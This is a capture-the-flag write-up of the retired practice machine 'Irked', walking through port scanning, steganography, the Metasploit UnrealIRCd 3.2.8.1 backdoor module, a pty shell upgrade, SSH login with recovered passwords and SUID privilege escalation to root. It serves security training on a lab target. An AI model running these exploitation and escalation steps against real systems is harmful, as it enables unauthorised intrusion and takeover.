Today, we’re going to solve another CTF machine “Irked”. It is now retired box and can be accessible to VIP member.

Specifications

  • Target OS: Linux
  • IP Address: 10.10.10.117
  • Difficulty: Easy

Contents

  • Getting user
  • Getting root

Reconnaissance

As always, the first step consists of reconnaissance phase as port scanning.

Ports Scanning

During this step we’re gonna identify the target to see what we have behind the IP Address.

nmap -p 1-65535 -T4 -A -v -oA intense-tcp 10.10.10.117

22/tcp    open  ssh     OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)                                                                                  
| ssh-hostkey:                                                                                                                                        
|   1024 6a:5d:f5:bd:cf:83:78:b6:75:31:9b:dc:79:c5:fd:ad (DSA)                                                                                        
|   2048 75:2e:66:bf:b9:3c:cc:f7:7e:84:8a:8b:f0:81:02:33 (RSA)                                                                                        
|   256 c8:a3:a2:5e:34:9a:c4:9b:90:53:f7:50:bf:ea:25:3b (ECDSA)                                                                                       
|_  256 8d:1b:43:c7:d0:1a:4c:05:cf:82:ed:c1:01:63:a2:0c (EdDSA)                                                                                       
80/tcp    open  http    Apache httpd 2.4.10 ((Debian))                                                                                                
| http-methods:                                                                                                                                       
|_  Supported Methods: POST OPTIONS GET HEAD                                                                                                          
|_http-server-header: Apache/2.4.10 (Debian)                                                                                                          
|_http-title: Site doesn't have a title (text/html).                                                                                                  
111/tcp   open  rpcbind 2-4 (RPC #100000)                                                                                                             
| rpcinfo:
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100024  1          53832/tcp  status
|_  100024  1          58245/udp  status
6697/tcp  open  irc     UnrealIRCd
8067/tcp  open  irc     UnrealIRCd
53832/tcp open  status  1 (RPC #100024)
65534/tcp open  irc     UnrealIRCd

Enumeration

Let’s browse URL http://10.10.10.117/

If we take a look at view-source:http://10.10.10.117/ we found nothing but and image.

Steganography

Let’s wget irked.jpg and enumerate for hidden information inside image.

xxd irked.jpg
strings irked.jpg

If we try to extract information with steghide it requires password which is odd.

steghide extract -sf irked.jpg

Let’s keep this aside for now and move ahead.

Exploitation

The nmap scan revels we have UnrealIRCd installed let’s find out which version is it. We can connect to IRC using HexChat and see the response.

It reveled version 3.2.8.1 for UnrealIRCd.

Let’s searchsploit unrealircd and see if there’s any exploit available for this version.

We have bunch of exploits let’s test them.

Metasploit

Let’s fire up msfconsole and search unreal

msf5 > use exploit/unix/irc/unreal_ircd_3281_backdoor
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > set rhosts 10.10.10.117
rhosts => 10.10.10.117
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > set rport 6697
rport => 6697

Now let’s exploit and see magic.

We have a restricted shell let’s upgrade our shell using python.

python -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm

We found user.txt flag inside /home/djmardov/Documents but don’t have permission to read it.

[email protected]:/home/djmardov/Documents$ pwd
pwd
/home/djmardov/Documents
[email protected]:/home/djmardov/Documents$ ls -la
ls -la
total 16
drwxr-xr-x  2 djmardov djmardov 4096 May 15  2018 .
drwxr-xr-x 18 djmardov djmardov 4096 Nov  3 04:40 ..
-rw-r--r--  1 djmardov djmardov   52 May 16  2018 .backup
-rw-------  1 djmardov djmardov   33 May 15  2018 user.txt
[email protected]:/home/djmardov/Documents$ wc -c user.txt
wc -c user.txt
wc: user.txt: Permission denied

For that we have to spawn our shell as djmardov user to read our flag but if you take a look at .backup file we have read permission.

[email protected]:/home/djmardov/Documents$ cat .backup
cat .backup
Super elite steg backup pw
UPupDOWNdownLRlrBAbaSSss

It says steg backup password since we found and irked.jpg image and it was password protected we can try extracting information using this password.

Steghide extracted a pass.txt file successfully and it contains another password.

Kab6h+m+bbp2J:HG

We can assume that it’s an SSH password for djmardov because we had SSH port opened. let’s try our luck.

[email protected]rph0enix:~# ssh [email protected]
[email protected]'s password: Kab6h+m+bbp2J:HG

[email protected]:~$ 

Now, we can successfully read user.txt flag.

Privilege Escalation

We can use scripts to find odd things or we could just manually enumerate for things.

Let’s get started!

[email protected]:~$ sudo -l
-bash: sudo: command not found

Let’s find which services and applications are running or to find something interesting.

ps aux | grep root
ps -ef | grep root

Let’s find SUID files.

find / -perm -u=s -type f 2>/dev/null

OR

find / -perm -u=s -type f -maxdepth 6 -exec ls -ld {} \; 2>/dev/null

This file /usr/bin/viewuser seems odd because it’s recently modified.

[email protected]:~# /usr/bin/viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0           2019-04-28 22:35 (:0)
djmardov pts/2        2019-05-04 05:58 (10.10.14.6)

Now if we execute /usr/bin/viewuser it will run our /tmp/listusers opening a shell as root, because viewuser was being executed as root.

And we got root flag.

[email protected]:~# id
uid=0(root) gid=1000(djmardov) groups=1000(djmardov),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),110(lpadmin),113(scanner),117(bluetooth)
[email protected]:~# wc -c /root/root.txt 
33 /root/root.txt